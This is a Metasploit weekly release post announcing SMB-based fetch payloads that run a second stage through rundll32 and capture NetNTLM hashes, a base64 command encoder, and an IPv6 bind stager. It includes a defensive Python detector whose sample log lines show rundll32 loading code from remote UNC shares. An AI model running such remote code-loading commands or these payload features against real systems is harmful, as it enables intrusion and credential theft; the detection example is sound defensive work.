Metasploit Weekly Wrap-Up 02/16/2024


New Fetch Payload


It has been almost a year since Metasploit released the new fetch payloads, and since then 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32, which has the added benefit of capturing the NetNTLM hashes of the requestor.


This also streamlines the previous workflow, in which the user first started the exploit/windows/smb/smb_delivery module and then copied its generated command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the SMB service and generate the command.


As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.
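Because an SMB-enabled fetch payload is executed by rundll32 loading a file from a UNC path, that process-creation pattern is what a defender can hunt for in endpoint telemetry. The Python below is an added example, not part of this post or of Metasploit: it runs that check over a few constructed process-creation records (the pipe-delimited format, hostnames and server addresses are all assumptions), with an allowlist for sanctioned file servers to keep legitimate loads out of the findings.

```python
import re
from dataclasses import dataclass
from typing import List, Set, Tuple

# Constructed sample process-creation events (not real telemetry).
# Format per line: timestamp|host|image|command_line
SAMPLE_EVENTS = """\
2024-02-16T10:01:02Z|WS01|C:\\Windows\\System32\\rundll32.exe|rundll32.exe \\\\10.0.0.5\\share\\payload.dll,0
2024-02-16T10:01:05Z|WS01|C:\\Windows\\System32\\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
2024-02-16T10:02:00Z|WS02|C:\\Windows\\System32\\cmd.exe|cmd.exe /c dir \\\\fileserver\\docs
2024-02-16T10:03:00Z|WS03|C:\\Windows\\System32\\rundll32.exe|RUNDLL32.EXE \\\\fileserver\\apps\\helper.dll,Init
2024-02-16T10:04:00Z|WS03|C:\\Windows\\System32\\rundll32.exe|rundll32.exe \\\\198.51.100.7\\c$\\x,DllMain
"""

# A UNC target: two backslashes, a server name, a backslash, then share/path.
UNC_RE = re.compile(r"\\\\([^\\\s]+)\\\S+")

@dataclass
class Event:
    timestamp: str
    host: str
    image: str
    command_line: str

def parse_events(text: str) -> List[Event]:
    """Parse the pipe-delimited constructed log format into Event records."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(Event(*line.split("|", 3)))
    return events

def detect_remote_rundll32(events: List[Event], allowed_servers: Set[str] = frozenset()) -> List[Tuple[str, str, str]]:
    """Return (timestamp, host, remote_server) for each rundll32 launch naming a UNC path.
    Keys on the image name, not a .dll extension: rundll32 loads whatever the path points
    to, however the file is named. Servers in allowed_servers (sanctioned shares) are skipped."""
    findings = []
    for ev in events:
        if ev.image.rsplit("\\", 1)[-1].lower() != "rundll32.exe":
            continue
        m = UNC_RE.search(ev.command_line)
        if m and m.group(1).lower() not in allowed_servers:
            findings.append((ev.timestamp, ev.host, m.group(1).lower()))
    return findings

if __name__ == "__main__":
    for ts, host, server in detect_remote_rundll32(parse_events(SAMPLE_EVENTS), {"fileserver"}):
        print(f"{ts} {host}: rundll32 loading code from \\\\{server}")
```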


New module content (2)


Base64 Command Encoder


Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner


Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.


SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager


Authors: Spencer McIntyre, bwatters-r7, and sf
Type: Payload (Adapter)
Pull request: #18664 contributed by metasploit weekly